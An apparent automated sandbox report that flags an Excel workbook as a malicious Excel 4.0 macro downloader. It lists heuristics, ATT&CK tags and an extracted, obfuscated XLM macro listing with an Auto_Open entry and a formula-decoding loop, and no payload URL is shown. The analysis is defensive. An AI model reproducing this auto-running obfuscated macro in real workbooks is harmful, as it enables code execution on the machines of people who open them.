Verdict: MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open defined name, which is a critical finding indicating automatic execution upon opening. The macros utilize dangerous formula APIs, including a RUN function, suggesting an intent to execute arbitrary code. While the exact payload is not visible, the presence of these elements strongly indicates a downloader or initial execution stage for a malicious artifact.
Heuristics (3)
- Excel 4.0 Auto_Open defined name [critical, OLE_XLM_AUTOOPEN_DEFINEDNAME]: oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs [critical, OLE_XLM_DANGEROUS_FN]: Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present [medium, OLE_XLM_AUTOOPEN]: Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6563 bytes |

SHA-256: 316f1bb657f7e1d9155d84db708e10ca3634dd1585b5f1d5320c8135e3244b57
Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - fdo
' 0018 22 LABEL : Cell Value, String Constant - AKqPdFk len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G153
' 0018 21 LABEL : Cell Value, String Constant - byILBG len=0
' 0018 22 LABEL : Cell Value, String Constant - DljQoDM len=0
' 0018 20 LABEL : Cell Value, String Constant - DVUgs len=0
' 0018 21 LABEL : Cell Value, String Constant - ekehnR len=0
' 0018 25 LABEL : Cell Value, String Constant - FkYGYghOVO len=0
' 0018 23 LABEL : Cell Value, String Constant - gsNQWJaH len=0
' 0018 22 LABEL : Cell Value, String Constant - hUdzGoX len=0
' 0018 24 LABEL : Cell Value, String Constant - KorOwOOMg len=0
' 0018 21 LABEL : Cell Value, String Constant - lQOGHX len=0
' 0018 20 LABEL : Cell Value, String Constant - mdQMH len=0
' 0018 26 LABEL : Cell Value, String Constant - MemwVMrOSyo len=0
' 0018 24 LABEL : Cell Value, String Constant - obgkLsORl len=0
' 0018 21 LABEL : Cell Value, String Constant - qaOJNo len=0
' 0018 23 LABEL : Cell Value, String Constant - QdzJSNds len=0
' 0018 24 LABEL : Cell Value, String Constant - rNlZvGoHv len=0
' 0018 21 LABEL : Cell Value, String Constant - VxWxMF len=0
' 0018 24 LABEL : Cell Value, String Constant - xSDXGoIAk len=0
' 0018 26 LABEL : Cell Value, String Constant - zeKOYqsFUsx len=0
' 0018 23 LABEL : Cell Value, String Constant - zPgaNVXo len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' fdo,Q46,"",219.00000000000000000000
' fdo,Q47,"",-988.00000000000000000000
' fdo,Q48,"",701.00000000000000000000
' fdo,Q49,"",-368.00000000000000000000
' fdo,Q50,"",-97.00000000000000000000
' fdo,Q51,"",488.00000000000000000000
' fdo,G61,"SET.NAME("qaOJNo",0+VALUE("0"))",""
' fdo,G65,"SET.NAME("obgkLsORl",qaOJNo)",""
' fdo,G68,"SET.NAME("DljQoDM",qaOJNo)",""
' fdo,G70,"SET.NAME("ekehnR",COUNTA(MemwVMrOSyo))",""
' fdo,G73,"SET.NAME("lQOGHX",COUNTA(VxWxMF))",""
' fdo,G77,[],""
' fdo,G81,"SET.NAME("FkYGYghOVO","")",""
' fdo,G85,"obgkLsORl",""
' fdo,G87,"SET.NAME("zeKOYqsFUsx",HLOOKUP("*",MemwVMrOSyo,obgkLsORl,FALSE))",""
' fdo,G90,"hUdzGoX",""
' fdo,G93,"SET.NAME("QdzJSNds",qaOJNo)",""
' fdo,G98,[],""
' fdo,G103,"QdzJSNds",""
' fdo,G106,"KorOwOOMg",""
' fdo,G109,"byILBG",""
' fdo,G114,"gsNQWJaH",""
' fdo,G118,"SET.NAME("mdQMH",VALUE(HLOOKUP("*",VxWxMF,gsNQWJaH,FALSE)))",""
' fdo,G123,"AKqPdFk",""
' fdo,G126,"FkYGYghOVO",""
' fdo,G128,"DljQoDM",""
' fdo,G132,NEXT(),""
' fdo,G136,"xSDXGoIAk",""
' fdo,G138,[],""
' fdo,G142,"zPgaNVXo",""
' fdo,G145,NEXT(),""
' fdo,G148,RETURN(),""
' fdo,G176,"SET.NAME("rNlZvGoHv",G61)",""
' fdo,G179,"MemwVMrOSyo",""
' fdo,G182,"SET.NAME("VxWxMF",R72C12)",""
' fdo,G187,"SET.NAME("zPgaNVXo",195)",""
' fdo,G192,"SET.NAME("DVUgs",7)",""
' fdo,G194,rNlZvGoHv(),""
' fdo,G195,HALT(),""